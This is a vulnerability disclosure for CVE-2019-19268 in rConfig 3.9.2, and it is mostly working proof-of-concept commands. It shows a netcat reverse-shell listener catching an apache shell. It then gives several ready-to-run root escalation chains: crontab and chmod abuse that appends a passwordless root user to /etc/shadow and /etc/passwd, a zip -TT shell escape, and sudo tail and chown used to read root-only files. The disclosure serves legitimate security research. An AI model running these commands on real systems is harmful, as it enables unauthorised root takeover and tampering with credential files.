# CVE-2019-19268
# Affected Version: rConfig 3.9.2.

[Description]<br>
Multiple attack vectors in rConfig v3.9.2 due to misconfiguration, which allows local users to execute root commands via sudo.

[Discoverers]<br>
dmw0ng - Discord: dmw0ng#4449 <br>
TheCyberGeek - Discord: TheCyberGeek#1892 <br>
Email: cybergeek19@protonmail.com <br>

The Sudo configuration in rConfig 3.9.2 gives the apache user access to execute the /usr/bin/zip, /bin/chmod, and /usr/bin/tail programs as root. This can be used for remote code execution in conjunction with CVE-2019-16662 and CVE-2019-16663.

This is a set of vulnerabilities leading to system compromise due to user improper configuration.

[Vulnerability Type]<br>
Insecure Permissions

OS: CentOS 7.7.1908
Software: rConfig v3.9.2

Multiple attack vectors in rConfig v3.9.2 due to misconfiguration, which allows local users to execute root commands via sudo.

Using Askar's exploit:<br>
https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ we gain apache user on rConfig 3.9.2.

# Access
```
root@TheCyberGeek:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.230.22: inverse host lookup failed: Unknown host
connect to [10.10.11.3] from (UNKNOWN) [192.168.230.22] 60598
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache)
```

# Rooting Multiple Attack Vectors:

User apache may run the following commands on Misconfigured:<br>
    (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm
    
# sudo /usr/bin/crontab:
```
id
uid=48 gid=48(apache) groups=48(apache)
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l
* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow
* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd
su pwned
id
uid=0(root) gid=0(root) groups=0(root)
```
<img src="PocCrontab.png"></img>

# sudo /usr/bin/zip:

```
id
uid=48 gid=48(apache) groups=48(apache)
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 65%)
sudo rm $TF
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
```
<img src="PocZip.png"></img>

# sudo /bin/chmod
```
sudo /bin/chmod 777 /etc/shadow
sudo /bin/chmod 777 /etc/passwd
echo "pwned:::0:99999:7:::" >> /etc/shadow
echo "pwned:x:0:0:root:/root:/bin/bash" >> /etc/passwd
su pwned
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
```
<img src="PocChmod.png"></img>

<img src="PocChmod1.png"></img>

# sudo /usr/bin/tail File Read
```
id
uid=48(apache) gid=48(apache) groups=48(apache)
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt

LFILE=/root/secret.txt
sudo tail -c1G "$LFILE"
I got the secret
```
<img src="PocTail.png"></img>

<img src="PocTail1.png"></img>

# sudo /bin/chown Change File Permissions
```
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
sudo /bin/chown apache:apache /root/secret.txt
ls -la /root/secret.txt
-rwx------ 1 apache apache 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt
I got the secret
```
<img src="PocTail.png"></img>

<img src="PocChown.png"></img>

<img src="PocChown1.png"></img>

In turn we fully compromise any CentOS 7.7.1908 with rConfig installed.
